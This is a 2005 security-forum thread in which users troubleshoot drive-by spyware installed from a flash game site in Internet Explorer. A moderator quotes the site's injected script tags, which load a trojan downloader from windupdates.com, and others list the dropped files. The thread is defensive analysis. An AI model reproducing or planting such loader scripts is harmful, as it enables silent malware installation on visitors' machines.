Auto-installing spyware

Discussion in 'other security issues & news' started by jsmsb, Jan 29, 2005.

Thread Status:
Not open for further replies.
  1. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    I was looking for a flash golf game I used to play a couple of years ago, when I ran across this site hxxp://www.gamesloth.com/games/miniputt.html . I have Norton Internet Security 2005 using current definitions and updates. I was also running adwatch (lavasoft) in the background, and have IE security pretty much globally set to ask permission on downloads and scripting. The site listed above pretty much ignores all settings and installs a crapload of nasty spyware. I'm wondering if this is a new vulnerability with IE or something that is a known issue. Thanks.
     
    Last edited by a moderator: Jan 29, 2005
  2. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    What did it install? I don't get a single thing installed.

    Cheers :D
     
  3. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    adv.exe, adx.exe, bargains.exe, exdl.exe, exul.exe, javexulm.vxd, mqexdlm.srg, plus a file names mmwork.exe, which installed and started running a few seconds after the page loaded. There was no other interaction from me other than opening the page. I know what type of spyware it is (bargain buddy), I just can't figure out how it installs without interaction from me.
     
  4. bigc73542

    bigc73542 Retired Moderator

    Joined:
    Sep 21, 2003
    Posts:
    23,873
    Location:
    SW. Oklahoma
    I just have been playing golf there and It didn't try to install anything on my comp.

    bigc
     
  5. puff-m-d

    puff-m-d Registered Member

    Joined:
    Feb 13, 2002
    Posts:
    4,451
    Location:
    North Carolina, USA
    Same here and I tried it on IE, FF, and Opera just to check.....
     
  6. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    Welcome to Wilders Jsmsb.

    I use Process Guard 3 and it would warn me to anything trying to install, absolutely nothing. I would suggest a run through the comprehensive steps found in General Cleaning to confirm your system is clean.

    If these steps do not resolve your situation, you will need to download and run “Hijack This” found here and post your log at one of the forums found at A-SAP. The two bigger forums for HijackThis log processing, (meaning they process more log threads each day than most others) are: SpywareInfo.com and CastleCops.com. Be sure to read their posting policy in the links at their log review forum sections prior to posting.

    The steps mentioned in General Cleaning use software that ought to be part of your security, as an absolute minimum.

    Once your system is clean, you may want to take a look here for further discussion on security and how to make your system that much stronger and here for more.

    This is what works really well for me, very simple to use and maintain.

    Hope this helps...

    Let us know how you go.

    Cheers :D
     
  7. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    I am almost finished cleaning up after this infection.
    After I run my post cleanup scans, I am going to go back to that site, and then post logs for you guys to look at. I double checked my IE security settings, and although they are not at the highest settings, they aren't (in my opinion) set loosely by any measure. NIS 2005 only alerts me to a single executable (the one that runs within a few seconds of the page loading) which tries to connect to the internet. Thanks again for the help.
     
  8. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Well guys although you did not get anything installed on your comps, from the firefox adblock extension here you see that golf game site has more crap than you thought. For that site, it would be best to use firefox or some other alternative browser. Don't use IE for that golf gaming website.
     

    Attached Files:

    Last edited by a moderator: Jan 29, 2005
  9. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    If you use IE to access that site its rather dangerous IMO. The spyware from that site must've got in via ActiveX. The best solution: Don't visit that site with IE. Use some other browser. Most spyware always gets in through IE.
     
  10. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    ok this is going to be a long post, I just wanted everyone to see all the crap I found (no doubt there are other entries I'll find later on). A funny thing though; this last time I had a hell of a time getting the site to infect my computer. I had to clear all my temp files and cookies before it would reinfect me. Also, this time it didn't place as much stuff as the first time.

    ~~HiJack This log removed IAW Wilders policy Announcement~
    * The restriction on posting unsolicited HijackThis logs also applies to unsolicited ASviewer (Autostart Viewer), Spybot S&D and Ad-aware logs....Bubba~~



    Spybot S&D found one additional file:

    Roings: Library (File, nothing done)
    C:\WINDOWS\system32\objsafe.tlb

    Had to be removed at startup because it was memory resident.

    I am aware of radmin being installed. (I use it quite often).
     
    Last edited by a moderator: Jan 29, 2005
  11. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    But do you know that your system was actually clean to begin with.

    Three of the Moderators have been on this site, and none of us get infected either in IE or FireFox. I receive NO warnings whatsoever, and I have a very comprehensive list of security. Nod32 does NOT try to terminate the connection.

    I think your system is infected and needs to be cleaned. When clean I think you will be able to go back to that site without seeing any problems.

    Hope this helps...

    Cheers :D

    PS. I have left your Hijack This Log visible as it may help to get to the bottom of your problem.
     
  12. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    The logs posted were done AFTER I cleaned the first infection, and after doing full system scans with all of the tools listed, and all of them returned clean results. All cookies, temp files, usage tracks, registry streams, etc were also deleted.

    One more thing I forgot to mention... My first encounter with this site (and first infection) occured using a fresh install of windows xp inside of vmware workstation, so I know for a fact it was not due to a previous infection.
     
  13. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    I am not a Spware Expert, however this has been identified:

    These entries have been positively identified as malicious programs. In the HijackThis program, place a check mark next to the following entries.

    O16 - DPF: {15AD4789-CDB4-47E1-A9DA-992EE8E6BAD6} - //static.windupdates.com/cab/C.../Bridge-c81.cab
    (Description: Advertising delivery service.)


    I would leave that entry until we can receive further advice. I'll ask someone to check your log and that entry.

    Cheers :D
     
  14. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    https://www.wilderssecurity.com/showpost.php?p=357708&postcount=8

    Look and see if you can find any malware/spyware links/sites in my screenshot. ;)
    Some of the malware/spyware in that HJT log is related to some things in my screenshot.
     
  15. jsmsb

    jsmsb Registered Member

    Joined:
    Jan 29, 2005
    Posts:
    9
    They are ALL related to that site :) . I can tell you that there is a single archive that downloads which contains three infected files. I suspect that this is happening because of an activex control marked safe that shouldn't be.
     
  16. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    ActiveX again... most spyware exploits activex to get in.
     
  17. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    When I click on the link (disabled above - //static.windupdates.com/cab/C.../Bridge-c81.cab) then I have a download window popup, and then problems arise, but not on the site itself with my setup.

    Are you running Service Pack 2?
     
  18. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    C'mon blackspear, look at the HJT log and you'll know if he's running SP1 or SP2. So obvious.
     
  19. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    LOL, sorry about that, it's getting late here, and I'm very tired, well that's my excuse and I'm sticking to it... ;) :D
     
  20. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    If you're tired take a break. Relax. :D
     
  21. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    As has been said on numerous occasions by those that rely on CERT, Securnia....etc....allowing script to run is how over 90% of IE vulnerabilities are exploited. That being said....if you allowed script to run on that site....the first 2 scripts it attempts to download are from a site....windupdates....a site that is listed in most all Restricted Site databases recommended by Security conscious individuals as far as IE goes).

    http modified in below script to ht_p by me:
    Code:
    <!-- AUTO PROMPT START 
    <script language="javascript" type="text/javascript"
    src="ht_p://public.windupdates.com/prompt.php?
    h=aa29aa189967340a8288ed2b9057d2b19cabff24300f137829310ba2b4d3e837
    2ad81a8f5929e2b39999bc3b3755bbb82ac9204d48ab87d8705687b414&k=59e9
    e102e1f098ddb678773f518103ad"></script>
    <script language="javascript" type="text/javascript">self.focus();</script>
    AUTO PROMPT END -->
    <!-- AUTO PROMPT START -->
    <script language="javascript" type="text/javascript"
    src="ht_p://public.windupdates.com/prompt.php?
    =829f69c63722f2a7b90c050f4d6ce22d355a438cc6f510216d4ae2c23a266258a
    f20a226c67b2596506263c020608e61d768c01f8fab3cb614a1585c140ae4d13c1
    300b8d3ba528d0db8fa4ef7813aceeb&k=dc69d02639a84a58c1501951dabb54db
    ></script>
    <script language="javascript" type="text/javascript">self.focus();</script>
    <!-- AUTO PROMPT END -->
    
    The 2 above URL downloads from windupdates produce the 2 js files:
    • 59e9e102e1f098ddb678773f518103ad.js
    • dc69d02639a84a58c1501951dabb54db.js
      Status: INFECTED/MALWARE
      Kaspersky Anti-Virus Trojan-Downloader.JS.Small.af

    The above js files is just the start of how static.windupdates.com/cab/C.../Bridge-c81.cab attempts to install.
     
  22. Blackspear

    Blackspear Global Moderator

    Joined:
    Dec 2, 2002
    Posts:
    15,115
    Location:
    Gold Coast, Queensland, Australia
    Thank you Bubba, my settings as well as the others were obviously too high for any effect to be seen. The HJT Log shows it though...

    Cheers :D
     
  23. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Hmmm, interesting... the spyware seems to get in via Javascript.
     
  24. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    As was mentioned above....the majority of Securnia's advisories give a solution for IE vulnerabilities....disable Active script !
     
  25. nadirah

    nadirah Registered Member

    Joined:
    Oct 14, 2003
    Posts:
    3,647
    Disable active scripting and the problem is solved 100%.
     
Loading...
Thread Status:
Not open for further replies.